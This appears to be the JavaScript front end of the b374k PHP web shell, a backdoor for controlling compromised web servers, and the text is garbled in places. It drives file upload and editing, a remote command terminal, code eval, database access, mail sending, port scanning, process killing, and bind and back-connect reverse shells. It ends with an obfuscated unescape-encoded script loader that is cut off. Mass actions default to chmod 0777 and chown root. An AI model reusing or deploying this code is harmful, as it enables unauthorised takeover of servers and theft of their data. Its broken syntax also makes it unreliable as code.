    ulcomputer = "<table class='boxtbl ulcomp'><thead><tr><th colspan='2'><p class='boxtitle'>Upload From Computer <a onclick='ul_add_comp();'>(+)</a></p></th></tr></thead><tbody class='ulcompadd'></tbody><tfoot><tr><td><span class='button navbar' data-path='"+path+"'>explorer</span></td><td><span class='button' onclick='\\"ul_go_comp();\">upload</span></td></tr><tr><td colspan='2' class='ulCompResult'></td></tr><tr><td colspan='2'><div id='ulDragNDrop'>Or Drag and Drop files here</div></td></tr><tr><td colspan='2' class='ulDragNDropResult'></td></tr></tfoot></table>";
    ulurl = "<table class='boxtbl ulurl'><thead><tr><th colspan='2'><p class='boxtitle'>Upload From Url <a onclick='ul_add_url();'>(+)</a></p></th></tr></thead><tbody class='ulurladd'></tbody><tfoot><tr><td><span class='button navbar' data-path='"+path+"'>explorer</span></td><td><span class='button' onclick='\\"ul_go_url();\">upload</span></td></tr><tr><td colspan='2' class='ulUrlResult'></td></tr></tfoot></table>";
    content = ulcomputer + '<br>' + ulurl + "<input type='hidden' class='ul_path' value='"+path+"'>";
    $('#explorer').html(content);
    ul_add_comp();
    ul_add_url();

    $('#ulDragNDrop').on('dragenter', function(e){
        e.stopPropagation();
        e.preventDefault();
    });
}

```

```
$('#ulDragNDrop').on('dragover', function(e) {
    e.stopPropagation();
    e.preventDefault();
});

$('#ulDragNDrop').on('drop', function(e) {

    files = e.target.files || e.dataTransfer.files;
    ulResult = $('#ulDragNDropResult');
    ulResult.html('');
    $.each(files, function(i) {
        if(this) {
            ulType = 'DragNDrop';
            filename = this.name;

            var formData = new FormData();
            formData.append('ulFile', this);
            formData.append('ulSaveTo', get_cwd());
            formData.append('ulFilename', filename);
            formData.append('ulType', 'comp');

            entry = "<p class='ulRes"+ulType+i+"'><span class='strong'>
            &gt;</span>&nbsp;<a onclick='view_entry(this);' class='ulFilename"+ulType+i+"'>"+filename+
            </a>&nbsp;<span class='ulProgress"+ulType+i+"'></span></p>";
            ulResult.append(entry);

            if(this.size<=0) {
                $('#ulProgress'+ulType+i).html(' ( failed ) ');
                $('#ulProgress'+ulType+i).removeClass('ulProgress'+
ulType+i);
                $('#ulFilename'+ulType+i).removeClass('ulFilename'+
ulType+i);
            }
            else {
                ul_start(formData, ulType, i);
            }
        }
    });
});

}

function ul_add_comp(path) {
    path = html_safe($('#ul_path').val());
    $('#ulcompadd').append("<tr><td style='width:144px'>File</td><td><input type='file'
    class='ulFileComp'></td></tr><tr><td>Save to</td><td><input type='text' class='ulSaveToComp'
    value='"+path+"' onkeydown=\"trap_enter(event, 'ul_go_comp');\"></td></tr><tr><td>Filena
    me (Optional)</td><td><input type='text' class='ulFilenameComp' onkeydown=\"trap_enter(even
    t, 'ul_go_comp');\"></td></tr>");
}

function ul_add_url(path) {
    path = html_safe($('#ul_path').val());
    $('#ulurladd').append("<tr><td style='width:144px'>File URL</td><td><input type='te
    xt' class='ulFileUrl' onkeydown=\"trap_enter(event, 'ul_go_url');\"></td></tr><tr><td>Save
    to</td><td><input type='text' class='ulSaveToUrl' value='"+path+"' onkeydown=\"trap_enter(e
    vent, 'ul_go_url');\"></td></tr><tr><td>Filename (Optional)</td><td><input type='text' clas
    s='ulFilenameUrl' onkeydown=\"trap_enter(event, 'ul_go_url');\"></td></tr>");
}

function ul_start(formData, ulType, i) {
    loading_start();
    $.ajax({
        url: targeturl,
        type: 'POST',
        data: formData,
        cache: false,
```



```

contentType: false,
processData: false,
xhr: function(){
    myXhr = $.ajaxSettings.xhr();
    if(myXhr.upload){
        myXhr.upload.addEventListener('progress', function(e){
            percent = Math.floor(e.loaded / e.total * 100);
            $(' .ulProgress'+ulType+i).html(' ( ' + percent + '% )'
);
        }, false);
    }
    return myXhr;
},
success: function(res){
    if(res.match(/Warning.*POST.*Content-Length.*of.*bytes.*exceeds.*th
e.*limit.*of/)){
        res = 'error';
    }

    if(res=='error'){
        $(' .ulProgress'+ulType+i).html(' ( failed )');
    }
    else{
        $(' .ulRes'+ulType+i).html(res);
    }
    loading_stop();
},
error: function(){
    loading_stop();
    $(' .ulProgress'+ulType+i).html(' ( failed )');
    $(' .ulProgress'+ulType+i).removeClass('ulProgress'+ulType+i);
    $(' .ulFilename'+ulType+i).removeClass('ulFilename'+ulType+i);
}
});
}

function ul_go(ulType){
    ulFile = (ulType=='comp')? $(' .ulFileComp'):$(' .ulFileUrl');
    ulResult = (ulType=='comp')? $(' .ulCompResult'):$(' .ulUrlResult');
    ulResult.html('');

    ulFile.each(function(i){
        if(((ulType=='comp')&&this.files[0])||((ulType=='url')&&(this.value!=''))){
            file = (ulType=='comp')? this.files[0]: this.value;
            filename = (ulType=='comp')? file.name: file.substring(file.lastInd
exOf('/')+1);

            ulSaveTo = (ulType=='comp')? $(' .ulSaveToComp')[i].value:$(' .ulSave
ToUrl')[i].value;
            ulFilename = (ulType=='comp')? $(' .ulFilenameComp')[i].value:$(' .ul
FilenameUrl')[i].value;

            var formData = new FormData();
            formData.append('ulFile', file);
            formData.append('ulSaveTo', ulSaveTo);
            formData.append('ulFilename', ulFilename);
            formData.append('ulType', ulType);

            entry = "<p class='ulRes"+ulType+i+"'><span class='strong'>&gt;</sp
an>&nbsp;<a onclick='view_entry(this);' class='ulFilename"+ulType+i+"'>" +filename+"</a>&nbsp;
p;<span class='ulProgress"+ulType+i+"'></span></p>";
            ulResult.append(entry);

            check = true;
            if(ulType=='comp'){
                check = (file.size<=0);
            }
            else check = (file=="");
        }
    });
}

```

```
                if(check){
                    $('ulProgress'+ulType+i).html(' ( failed ) ');
                    $('ulProgress'+ulType+i).removeClass('ulProgress'+ulType+i
);
                    $('ulFilename'+ulType+i).removeClass('ulFilename'+ulType+i
);
                }
                else{
                    ul_start(formData, ulType, i);
                }
            }
        });
    }

function trap_ctrl_enter(el, e, callback){
    if(e.ctrlKey && (e.keyCode == 10 || e.keyCode == 13)){
        if(callback!=null) window[callback]();
    }
    fix_tabchar(el, e);
}

function edit_save_raw(){
    edit_save('edit');
}

function edit_save_hex(){
    edit_save('hex');
}

function edit_save(editType){
    editFilename = $('#editFilename').val();
    editInput = $('#editInput').val();
    editSuccess = false;
    preserveTimestamp = 'false';
    if($('#cBox').hasClass('cBoxSelected')) preserveTimestamp = 'true';
    send_post({editType:editType,editFilename:editFilename,editInput:editInput,preserve
Timestamp:preserveTimestamp},
        function(res){
            if(res!='error'){
                editSuccess = 'success';
                view(editFilename, editType, preserveTimestamp);
            }
            else editSuccess = 'error';
        }
    );
}

function mass_act(type){
    buffer = get_all_cbox_selected('xplTable', 'xpl_href');

    if((type=='cut') || (type=='copy')){
        localStorage.setItem('bufferLength', buffer.length);
        localStorage.setItem('bufferAction', type);
        $.each(buffer,function(i,v){
            localStorage.setItem('buffer_'+i, v);
        });
    }
    else if(type=='paste'){
        bufferLength = localStorage.getItem('bufferLength');
        bufferAction = localStorage.getItem('bufferAction');
        if(bufferLength>0){
            massBuffer = '';
            for(var i=0;i<bufferLength;i++){
                if((buff = localStorage.getItem('buffer_'+i))){
                    massBuffer += buff + '\n';
                }
            }
        }
    }
}
```

```
        }
        massBuffer = $.trim(massBuffer);

        if(bufferAction=='cut') title = 'move';
        else if(bufferAction=='copy') title = 'copy';

        content = "<table class='boxtbl'><tr><td colspan='2'><textarea clas
s='massBuffer' style='height:120px;min-height:120px;' disabled>"+massBuffer+"</textarea></t
d></tr><tr><td class='colFit'>"+title+" here</td><td><input type='text' value='"+html_safe(
get_cwd())+"' onkeydown=\"\ttrap_enter(event, 'mass_act_go_paste');\"></td></tr><tr><td colsp
an='2'><span class='button' onclick=\"\mass_act_go('paste');\">"+title+"</span></td></tr></t
able>";

        show_box(ucfirst(title), content);
    }
}
else if((type=='extract (tar)') || (type=='extract (tar.gz)') || (type=='extract (zip)'
))){
    if(type=='extract (tar)') arcType = 'untar';
    else if(type=='extract (tar.gz)') arcType = 'untargz';
    else if(type=='extract (zip)') arcType = 'unzip';

    if(buffer.length>0){
        massBuffer = '';
        $.each(buffer,function(i,v){
            massBuffer += v + '\n';
        });
        massBuffer = $.trim(massBuffer);
        title = type;

        content = "<table class='boxtbl'><tr><td colspan='2'><textarea clas
s='massBuffer' style='height:120px;min-height:120px;' wrap='off' disabled>"+massBuffer+"</t
extarea></td></tr><tr><td class='colFit'>Extract to</td><td><input class='massValue' type='
text' value='"+html_safe(get_cwd())+"' onkeydown=\"\ttrap_enter(event, 'mass_act_go_
"+arcType
e+"');\"></td></tr><tr><td colspan='2'><span class='button' onclick=\"\mass_act_go('
"+arcType
e+"');\">extract</span></td></tr></table>";
        show_box(ucfirst(title), content);
    }
}
else if((type=='compress (tar)') || (type=='compress (tar.gz)') || (type=='compress (zi
p)'))){
    date = new Date();
    rand = date.getTime();
    if(type=='compress (tar)'){
        arcType = 'tar';
        arcFilename = rand+'.tar';
    }
    else if(type=='compress (tar.gz)'){
        arcType = 'targz';
        arcFilename = rand+'.tar.gz';
    }
    else if(type=='compress (zip)'){
        arcType = 'zip';
        arcFilename = rand+'.zip';
    }

    if(buffer.length>0){
        massBuffer = '';
        $.each(buffer,function(i,v){
            massBuffer += v + '\n';
        });
        massBuffer = $.trim(massBuffer);
        title = type;

        content = "<table class='boxtbl'><tr><td colspan='2'><textarea clas
s='massBuffer' style='height:120px;min-height:120px;' wrap='off' disabled>"+massBuffer+"</t
extarea></td></tr><tr><td class='colFit'>Archive</td><td><input class='massValue' type='tex
```

```
t' value='"+arcFilename+"' onkeydown=\"trap_enter(event, 'mass_act_go_"+arcType+"');\"></td></tr><tr><td colspan='2'><span class='button' onclick=\"mass_act_go('"+arcType+"');\">compress</span></td></tr></table>";
        show_box(ucfirst(title), content);
    }
}
else if(type!=''){
    if(buffer.length>0){
        massBuffer = '';
        $.each(buffer,function(i,v){
            massBuffer += v + '\n';
        });
        massBuffer = $.trim(massBuffer);
        title = type;
        line = '';
        if(type=='chmod') line = "<tr><td class='colFit'>chmod</td><td><input class='massValue' type='text' value='0777' onkeydown=\"trap_enter(event, 'mass_act_go_"+type+"');\"></td></tr>";
        else if(type=='chown') line = "<tr><td class='colFit'>chown</td><td><input class='massValue' type='text' value='root' onkeydown=\"trap_enter(event, 'mass_act_go_"+type+"');\"></td></tr>";
        else if(type=='touch'){
            var now = new Date();
            line = "<tr><td class='colFit'>touch</td><td><input class='massValue' type='text' value='"+now.toGMTString()+"' onkeydown=\"trap_enter(event, 'mass_act_go_"+type+"');\"></td></tr>";
        }

        content = "<table class='boxtbl'><tr><td colspan='2'><textarea class='massBuffer' style='height:120px;min-height:120px;' wrap='off' disabled>"+massBuffer+"</td></tr>"+line+"<tr><td colspan='2'><span class='button' onclick=\"mass_act_go('"+type+"');\">"+title+"</span></td></tr></table>";
        show_box(ucfirst(title), content);
    }
}

$('.cBoxSelected').removeClass('cBoxSelected');
xpl_update_status();
}

function mass_act_go_tar(){
    mass_act_go('tar');
}

function mass_act_go_targz(){
    mass_act_go('targz');
}

function mass_act_go_zip(){
    mass_act_go('zip');
}

function mass_act_go_untar(){
    mass_act_go('untar');
}

function mass_act_go_untargz(){
    mass_act_go('untargz');
}

function mass_act_go_unzip(){
    mass_act_go('unzip');
}

function mass_act_go_paste(){
    mass_act_go('paste');
}
}
```

```
function mass_act_go_chmod(){
    mass_act_go('chmod');
}

function mass_act_go_chown(){
    mass_act_go('chown');
}

function mass_act_go_touch(){
    mass_act_go('touch');
}

function mass_act_go(massType){
    massBuffer = $.trim($('.massBuffer').val());
    massPath = get_cwd();
    massValue = '';
    if(massType=='paste'){
        bufferLength = localStorage.getItem('bufferLength');
        bufferAction = localStorage.getItem('bufferAction');
        if(bufferLength>0){
            massBuffer = '';
            for(var i=0;i<bufferLength;i++){
                if((buff = localStorage.getItem('buffer_'+i))){
                    massBuffer += buff + '\n';
                }
            }
            massBuffer = $.trim(massBuffer);
            if(bufferAction=='copy') massType = 'copy';
            else if(bufferAction=='cut') massType = 'cut';
        }
    }
    else if((massType=='chmod') || (massType=='chown') || (massType=='touch')){
        massValue = $('.massValue').val();
    }
    else if((massType=='tar') || (massType=='targz') || (massType=='zip')){
        massValue = $('.massValue').val();
    }
    else if((massType=='untar') || (massType=='untargz') || (massType=='unzip')){
        massValue = $('.massValue').val();
    }
}

if(massBuffer!=''){
    send_post({massType:massType,massBuffer:massBuffer,massPath:massPath,massValue:massValue}, function(res){
        if(res!='error'){
            $('.boxresult').html(res+' Operation(s) succeeded');
        }
        else $('.boxresult').html('Operation(s) failed');
        navigate(get_cwd());
    });
}

function xpl_update_status(){
    totalSelected = $('#xplTable').find('.cBoxSelected').not('.cBoxAll').length;
    if(totalSelected==0) $('.xplSelected').html('');
    else $('.xplSelected').html(''+totalSelected+' item(s) selected');
}

function xpl_bind(){
    $('.navigate').off('click');
    $('.navigate').on('click', function(e){
        path = xpl_href($(this));
        navigate(path);
        hide_box();
    });
}
```

```
$('.navbar').off('click');
$('.navbar').on('click', function(e){
    path = $(this).attr('data-path');
    navigate(path);
    hide_box();
});

$('.newfolder').off('click');
$('.newfolder').on('click', function(e){
    path = html_safe(xpl_href($(this)));
    newfolder(path);
});

$('.newfile').off('click');
$('.newfile').on('click', function(e){
    path = html_safe(xpl_href($(this)));
    newfile(path);
});

$('.del').off('click');
$('.del').on('click', function(e){
    path = html_safe(xpl_href($(this)));
    del(path);
});

$('.view').off('click');
$('.view').on('click', function(e){
    path = xpl_href($(this));
    view(path, 'auto');
    hide_box();
});

$('.hex').off('click');
$('.hex').on('click', function(e){
    path = xpl_href($(this));
    view(path, 'hex');
});

$('#viewFullsize').off('click');
$('#viewFullsize').on('click', function(e){
    src = $('#viewImage').attr('src');
    window.open(src);
});

$('.edit').off('click');
$('.edit').on('click', function(e){
    path = xpl_href($(this));
    view(path, 'edit');
    hide_box();
});

$('.ren').off('click');
$('.ren').on('click', function(e){
    path = html_safe(xpl_href($(this)));
    ren(path);
});

$('.action').off('click');
$('.action').on('click', function(e){
    path = html_safe(xpl_href($(this)));
    action(path, 'file');
});

$('.actionfolder').off('click');
$('.actionfolder').on('click', function(e){
    path = html_safe(xpl_href($(this)));
    action(path, 'dir');
```

```
});

$('.actiondot').off('click');
$('.actiondot').on('click', function(e){
    path = html_safe(xpl_href($(this)));
    action(path, 'dot');
});

$('.dl').off('click');
$('.dl').on('click', function(e){
    path = html_safe(xpl_href($(this)));
    $('#form').append("<input type='hidden' name='download' value='"+path+"'>");
;
    $('#form').submit();
    $('#form').html('');
    hide_box();
});

$('.ul').off('click');
$('.ul').on('click', function(e){
    path = xpl_href($(this));
    navigate(path, false);
    path = html_safe(path);
    ul(path);
    hide_box();
});

$('.find').off('click');
$('.find').on('click', function(e){
    path = xpl_href($(this));
    navigate(path, false);
    path = html_safe(path);
    find(path);
    hide_box();
});

$('#massAction').off('click');
$('#massAction').on('change', function(e){
    type = $('#massAction').val();
    mass_act(type);
    $('#massAction').val('Action');
});

cbbox_bind('xplTable', 'xpl_update_status');
}

function xpl_href(el){
    return el.parent().parent().attr('data-path');
}

function multimedia(path){
    var a = $('video').get(0);
    send_post({multimedia:path}, function(res){
        a.src = res;
    });
    hide_box();
}

$('#terminalInput').on('keydown', function(e){
    if(e.keyCode==13){
        cmd = $('#terminalInput').val();
        terminalHistory.push(cmd);
        terminalHistoryPos = terminalHistory.length;
        if(cmd=='clear' || cmd=='cls'){
            $('#terminalOutput').html('');
        }
        else if((path = cmd.match(/cd(.*)/i)) || (path = cmd.match(/^[a-z]:$/i)))
{
```

```
        path = $.trim(path[1]);
        navigate(path);
    }
    else if(cmd!=''){
        send_post({ terminalInput: cmd }, function(res){
            cwd = html_safe(get_cwd());
            res = '<span class=\'strong\'>' + cwd + '&gt;' + '</span>' + html_safe
(cmd) + '\n' + res + '\n';

            $('#terminalOutput').append(res);
            bottom = $(document).height() - $(window).height();
            $(window).scrollTop(bottom);
        });
    }
    $('#terminalInput').val('');
    setTimeout("#$('#terminalInput').focus()", 100);
}
else if(e.keyCode==38){
    if(terminalHistoryPos>0){
        terminalHistoryPos--;
        $('#terminalInput').val(terminalHistory[terminalHistoryPos]);
        if(terminalHistoryPos<0) terminalHistoryPos = 0;
    }
}
else if(e.keyCode==40){
    if(terminalHistoryPos<terminalHistory.length-1){
        terminalHistoryPos++;
        $('#terminalInput').val(terminalHistory[terminalHistoryPos]);
        if(terminalHistoryPos>terminalHistory.length) terminalHistoryPos =
terminalHistory.length;
    }
}
fix_tabchar(this, e);
});

function eval_go(){
    evalType = $('#evalType').val();
    evalInput = $('#evalInput').val();
    evalOptions = $('#evalOptions').val();
    evalArguments = $('#evalArguments').val();

    if(evalOptions=='Options/Switches') evalOptions = '';
    if(evalArguments=='Arguments') evalArguments = '';

    if($.trim(evalInput)!=''){
        send_post({ evalInput:evalInput, evalType:evalType, evalOptions:evalOptions
, evalArguments:evalArguments },
        function(res){
            if(res!='error'){
                splits = res.split('{{|b374k|}}');
                if(splits.length==2){
                    output = splits[0]+"<hr>" + splits[1];
                    $('#evalOutput').html(output);
                }
                else{
                    $('#evalOutput').html(res);
                }
            }
        }
    );
}

function eval_init(){
    if((evalSupported = localStorage.getItem('evalSupported'))){
        eval_bind();
        output("eval : "+evalSupported);
        evalReady = true;
    }
}
```



```
else{
    send_post({evalGetSupported:"evalGetSupported"}, function(res){
        evalReady = true;
        if(res!="error"){
            localStorage.setItem('evalSupported', res);
            evalSupported = res;
            eval_bind();
            output("eval : "+evalSupported);
        }
    });
}

function eval_bind(){
    if((evalSupported!=null)&&(evalSupported!='')){
        splits = evalSupported.split(",");
        $.each(splits, function(i, k){
            $('#evalType').append("<option>" + k + "</option>");
        });
    }
    $('#evalType').on('change', function(e){
        if($('#evalType').val()=='php'){
            $('#evalAdditional').hide();
        }
        else{
            $('#evalAdditional').show();
        }
    });
    $('#evalOptions').on('focus', function(e){
        options = $('#evalOptions');
        if(options.val()=='Options/Switches') options.val('');
    });
    $('#evalOptions').on('blur', function(e){
        options = $('#evalOptions');
        if($.trim(options.val())=='') options.val('Options/Switches');
    });
    $('#evalArguments').on('focus', function(e){
        args = $('#evalArguments');
        if(args.val()=='Arguments') args.val('');
    });
    $('#evalArguments').on('blur', function(e){
        args = $('#evalArguments');
        if($.trim(args.val())=='') args.val('Arguments');
    });
    $('#evalInput').on('keydown', function(e){
        if(e.ctrlKey && (e.keyCode == 10 || e.keyCode == 13)){
            eval_go();
        }
        fix_tabchar(this, e);
    });
}
Zepto(function($){
    $('#decodeStr').on('keydown', function(e){
        if(e.ctrlKey && (e.keyCode == 10 || e.keyCode == 13)){
            decode_go();
        }
        fix_tabchar(this, e);
    });
});

function decode_go(){
    decodeStr = $('#decodeStr').val();
    send_post({decodeStr:decodeStr}, function(res){
        if(res!='error'){
            $('#decodeResult').html('');
            $('#decodeResult').html(res);
        }
    });
}
```

```
    });
}

Zepto(function($){
    db_init();

});

var dbSupported = "";
var dbPageLimit = 50;

function db_init(){
    if((dbSupported = localStorage.getItem('db_supported'))){
        db_bind();
        output("db : "+dbSupported);
        db_add_supported();
    }
    else{
        send_post({dbGetSupported:""}, function(res){
            if(res!="error"){
                localStorage.setItem('dbSupported', res);
                dbSupported = res;
                db_bind();
                output("db : "+dbSupported);
                db_add_supported();
            }
        });
    }
}

function db_add_supported(){
    splits = dbSupported.split(",");
    $.each(splits, function(i, k){
        $('#dbType').append("<option>"+k+"</option>");
    });
}

function db_bind(){
    $('#dbType').on('change', function(e){
        type = $('#dbType').val();
        if((type=='odbc') || (type=='pdo')){
            $('#dbHostLbl').html('DSN / Connection String');
            $('#dbUserRow').show();
            $('#dbPassRow').show();
            $('#dbPortRow').hide();
        }
        else if((type=='sqlite') || (type=='sqlite3')){
            $('#dbHostLbl').html('DB File');
            $('#dbUserRow').hide();
            $('#dbPassRow').hide();
            $('#dbPortRow').hide();
        }
        else{
            $('#dbHostLbl').html('Host');
            $('#dbUserRow').show();
            $('#dbPassRow').show();
            $('#dbPortRow').show();
        }
    });

    $('#dbQuery').on('focus', function(e){
        if($('#dbQuery').val()=='You can also press ctrl+enter to submit'){
            $('#dbQuery').val('');
        }
    });
});
```

```
$('#dbQuery').on('blur', function(e){
    if($('#dbQuery').val()==''){
        $('#dbQuery').val('You can also press ctrl+enter to submit');
    }
});
$('#dbQuery').on('keydown', function(e){
    if(e.ctrlKey && (e.keyCode == 10 || e.keyCode == 13)){
        db_run();
    }
});
}

function db_nav_bind(){
    dbType = $('#dbType').val();
    $('#.boxNav').off('click');
    $('#.boxNav').on('click', function(){
        $(this).next().toggle();
    });

    $('#.dbTable').off('click');
    $('#.dbTable').on('click', function(){
        type = $('#dbType').val();
        table = $(this).html();
        db = $(this).parent().parent().parent().prev().html();
        db_query_tbl(type, db, table, 0, dbPageLimit);
    });
}

function db_connect(){
    dbType = $('#dbType').val();
    dbHost = $('#dbHost').val();
    dbUser = $('#dbUser').val();
    dbPass = $('#dbPass').val();
    dbPort = $('#dbPort').val();
    send_post({dbType:dbType, dbHost:dbHost, dbUser:dbUser, dbPass:dbPass, dbPort:dbPort}, function(res){
        if(res!='error'){
            $('#dbNav').html(res);
            $('#.dbHostRow').hide();
            $('#.dbUserRow').hide();
            $('#.dbPassRow').hide();
            $('#.dbPortRow').hide();
            $('#.dbConnectRow').hide();
            $('#.dbQueryRow').show();
            $('#dbBottom').show();
            db_nav_bind();
        }
        else $('#.dbError').html('Unable to connect');
    });
}

function db_disconnect(){
    $('#.dbHostRow').show();
    $('#.dbUserRow').show();
    $('#.dbPassRow').show();
    $('#.dbPortRow').show();
    $('#.dbConnectRow').show();
    $('#.dbQueryRow').hide();
    $('#dbNav').html('');
    $('#dbResult').html('');
    $('#dbBottom').hide();
}

function db_run(){
    dbType = $('#dbType').val();
    dbHost = $('#dbHost').val();
    dbUser = $('#dbUser').val();
    dbPass = $('#dbPass').val();
```

```
dbPort = $('#dbPort').val();
dbQuery = $('#dbQuery').val();

if((dbQuery!='')&&(dbQuery!='You can also press ctrl+enter to submit')){
    send_post({dbType:dbType, dbHost:dbHost, dbUser:dbUser, dbPass:dbPass, dbPort:dbPort, dbQuery:dbQuery}, function(res){
        if(res!='error'){
            $('#dbResult').html(res);
            $('.tblResult').each(function(){
                sorttable.k(this);
            });
        }
    });
}

function db_query_tbl(type, db, table, start, limit){
    dbType = $('#dbType').val();
    dbHost = $('#dbHost').val();
    dbUser = $('#dbUser').val();
    dbPass = $('#dbPass').val();
    dbPort = $('#dbPort').val();

    send_post({dbType:dbType, dbHost:dbHost, dbUser:dbUser, dbPass:dbPass, dbPort:dbPort, dbQuery:'', dbDB:db, dbTable:table, dbStart:start, dbLimit:limit}, function(res){
        if(res!='error'){
            $('#dbResult').html(res);
            $('.tblResult').each(function(){
                sorttable.k(this);
            });
        }
    });
}

function db_pagination(type){
    db = $('#dbDB').val();
    table = $('#dbTable').val();
    start = parseInt($('#dbStart').val());
    limit = parseInt($('#dbLimit').val());
    dbType = $('#dbType').val();

    if(type=='next'){
        start = start+limit;
    }
    else if(type=='prev'){
        start = start-limit;
        if(start<0) start = 0;
    }
    db_query_tbl(dbType, db, table, start, limit);
}

Zepto(function($){
    info_init();
});

function info_init(){
    if((infoResult = localStorage.getItem('infoResult'))){
        $('#infoResult').html(infoResult);
    }
    else{
        info_refresh();
    }
}

function info_toggle(id){
    $('#'+id).toggle();
}
```

```
function info_refresh(){
    send_post({infoRefresh:'infoRefresh'}, function(res){
        $('#infoResult').html(res);
        localStorage.setItem('infoResult', res);
    });
}

Zepto(function($){

});

function mail_send(){
    mailFrom = $.trim($('#mailFrom').val());
    mailTo = $.trim($('#mailTo').val());
    mailSubject = $.trim($('#mailSubject').val());
    mailContent = $('#mailContent').val();
    mailAttachment = '';
    if($('#mailAttachment')){
        mailAttachment = $('#mailAttachment').map(function(){ return this.value; })
        .get().join('{|b374k|}');
    }

    send_post({mailFrom:mailFrom, mailTo:mailTo, mailSubject:mailSubject, mailContent:mailContent, mailAttachment:mailAttachment}, function(res){
        $('#mailResult').html(res);
    });
}

function mail_attach(){
    content = "<tr><td>Local file <a onclick=\"$(this).parent().parent().remove();\">(-</a></td><td colspan='2'><input type='text' class='mailAttachment' value=''></td></tr>";
    $('#mailTBody').append(content);
}

Zepto(function($){
    rs_init();
});

function rs_init(){
    if(evalReady&&(evalSupported!=null)&&(evalSupported!='')){
        splits = evalSupported.split(",");
        $.each(splits, function(i, k){
            $('#rsType').append("<option>"+k+"</option>");
        });
    }
    else setTimeout('rs_init()', 1000);

    $('#packetContent').on('keydown', function(e){
        if(e.ctrlKey && (e.keyCode == 10 || e.keyCode == 13)){
            packet_go();
        }
        fix_tabchar(this, e);
    });
}

function rs_go_bind(){
    rs_go('bind');
}

function rs_go_back(){
    rs_go('back');
}

function rs_go(rsType){
    rsArgs = "";
    if(rsType=='bind'){
        rsPort = parseInt($('#bindPort').val());
    }
}
```

```
rsLang = $('#bindLang').val();
rsArgs = rsPort;
rsResult = $('#bindResult');
}
else if(rsType=='back'){
    rsAddr = $('#backAddr').val();
    rsPort = parseInt($('#backPort').val());
    rsLang = $('#backLang').val();
    rsArgs = rsPort + ' ' + rsAddr;
    rsResult = $('#backResult');
}

if((isNaN(rsPort)) || (rsPort<=0) || (rsPort>65535)){
    rsResult.html('Invalid port');
    return;
}

if(rsArgs!=''){
    send_post({ rsLang:rsLang, rsArgs:rsArgs },
        function(res){
            if(res!='error'){
                splits = res.split('{{|b374k|}}');
                if(splits.length==2){
                    output = splits[0]+"<hr>"+splits[1];
                    rsResult.html(output);
                }
                else{
                    rsResult.html(res);
                }
            }
        }
    );
}

function packet_go(){
    packetHost = $('#packetHost').val();
    packetStartPort = parseInt($('#packetStartPort').val());
    packetEndPort = parseInt($('#packetEndPort').val());
    packetTimeout = parseInt($('#packetTimeout').val());
    packetSTimeout = parseInt($('#packetSTimeout').val());
    packetContent = $('#packetContent').val();
    packetResult = $('#packetResult');
    packetStatus = $('#packetStatus');

    if((isNaN(packetStartPort)) || (packetStartPort<=0) || (packetStartPort>65535)){
        packetResult.html('Invalid start port');
        return;
    }
    if((isNaN(packetEndPort)) || (packetEndPort<=0) || (packetEndPort>65535)){
        packetResult.html('Invalid end port');
        return;
    }
    if((isNaN(packetTimeout)) || (packetTimeout<=0)){
        packetResult.html('Invalid connection timeout');
        return;
    }
    if((isNaN(packetSTimeout)) || (packetSTimeout<=0)){
        packetResult.html('Invalid stream timeout');
        return;
    }

    if(packetStartPort>packetEndPort){
        start = packetEndPort;
        end = packetStartPort;
    }
    else{
        start = packetStartPort;
```

```
        end = packetEndPort;
    }

    packetResult.html('');
    while(start<=end){
        packetPort = start++;
        packetResult.append("<hr><div><p class='boxtitle'>Host : "+html_safe(packet
Host)+": "+packetPort+"</p><br><div id='packet"+packetPort+"' style='padding:2px 4px;'>Worki
ng... please wait...</div></div>");
        packet_send(packetHost, packetPort, packetEndPort, packetTimeout, packetSTi
meout, packetContent);
    }
}

function packet_send(packetHost, packetPort, packetEndPort, packetTimeout, packetSTimeout,
packetContent){
    send_post({packetHost:packetHost, packetPort:packetPort, packetEndPort:packetEndPor
t, packetTimeout:packetTimeout, packetSTimeout:packetSTimeout, packetContent:packetContent}
, function(res){
        $('#packet'+packetPort).html(res);
    }, false);
}

Zepto(function($){
    show_processes();
});

function show_processes(){
    send_post({showProcesses:''}, function(res){
        if(res!='error'){
            $('#processes').html(res);
            sorttable.k($('#psTable').get(0));
            ps_bind();
        }
    });
}

function ps_bind(){
    $('.kill').off('click');
    $('.kill').on('click', function(e){
        kill_pid(ps_get_pid($(this)));
    });

    cbbox_bind('psTable','ps_update_status');
}

function ps_get_pid(el){
    return el.parent().parent().attr('data-pid');
}

function ps_update_status(){
    totalSelected = $('#psTable').find('.cBoxSelected').not('.cBoxAll').length;
    if(totalSelected==0) $('#psSelected').html('');
    else $('#psSelected').html(' ( '+totalSelected+' item(s) selected )');
}

function kill_selected(){
    buffer = get_all_cbbox_selected('psTable', 'ps_get_pid');

    allPid = '';
    $.each(buffer, function(i,v){
        allPid += v + ' ';
    });
    allPid = $.trim(allPid);
    kill_pid(allPid);
}
```

```
function kill_pid(allPid){
    title = 'Kill';
    content = "<table class='boxtbl'><tr><td colspan='2'><textarea class='allPid' style
='height:120px;min-height:120px;' disabled>"+allPid+"</textarea></td></tr><tr><td colspan='
2'><span class='button' onclick=\"kill_pid_go();\">kill</span></td></tr></table>";
    show_box(title, content);
}

function kill_pid_go(){
    allPid = $('allPid').val();
    if($.trim(allPid)!=''){
        send_post({allPid:allPid}, function(res){
            if(res!='error'){
                $('boxresult').html(res + ' process(es) killed');
            }
            else $('boxresult').html('Unable to kill process(es)');
            show_processes();
        });
    }
}

<?php
    foreach($GLOBALS['module_to_load'] as $k){
        echo "function ".$GLOBALS['module'][$k]['id']. "(){ ".$GLOBALS['module'][$k]
['js_ontabselected']. " }\n";
    }
?>
</script>
<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%7
5%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73
%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73
%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%6
9%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43
%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%
73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%6
